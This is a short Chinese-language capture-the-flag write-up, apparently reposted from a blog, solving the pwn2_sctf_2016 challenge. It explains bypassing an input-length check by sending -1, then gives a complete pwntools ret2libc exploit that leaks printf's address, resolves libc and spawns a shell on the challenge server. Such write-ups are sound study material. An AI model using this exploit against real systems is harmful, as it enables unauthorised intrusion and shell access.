其他分享
首页 > 其他分享> > 4

4

作者:互联网

pwn2_sctf_2016

1.ida分析

 

存在栈溢出漏洞,但是有一个限制输入字符数的保护。

 

 

 可以看到参数a2从int类型变成了unsigned int类型,可以利用来绕过保护。(一开始一直卡在怎么绕过,麻了)

 

2.checksec

 

 

3.解决

from pwn import *
from LibcSearcher import *
context.log_level='debug'

p=remote('node4.buuoj.cn',28425)
#p=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
main=0x804852f

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter('data!\n',payload)


p.recvuntil('\n')
#gdb.attach(p)
printf_addr=u32(p.recv(4))
print hex(printf_addr)

libc=LibcSearcher("printf",printf_addr)
base=printf_addr-libc.dump("printf")
system=base+libc.dump("system")
bin_sh=base+libc.dump("str_bin_sh")

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter('data!\n',payload)


p.interactive()

 

标签:,addr,libc,printf,sendlineafter,p32,payload
来源: https://www.cnblogs.com/mio-yy/p/15028458.html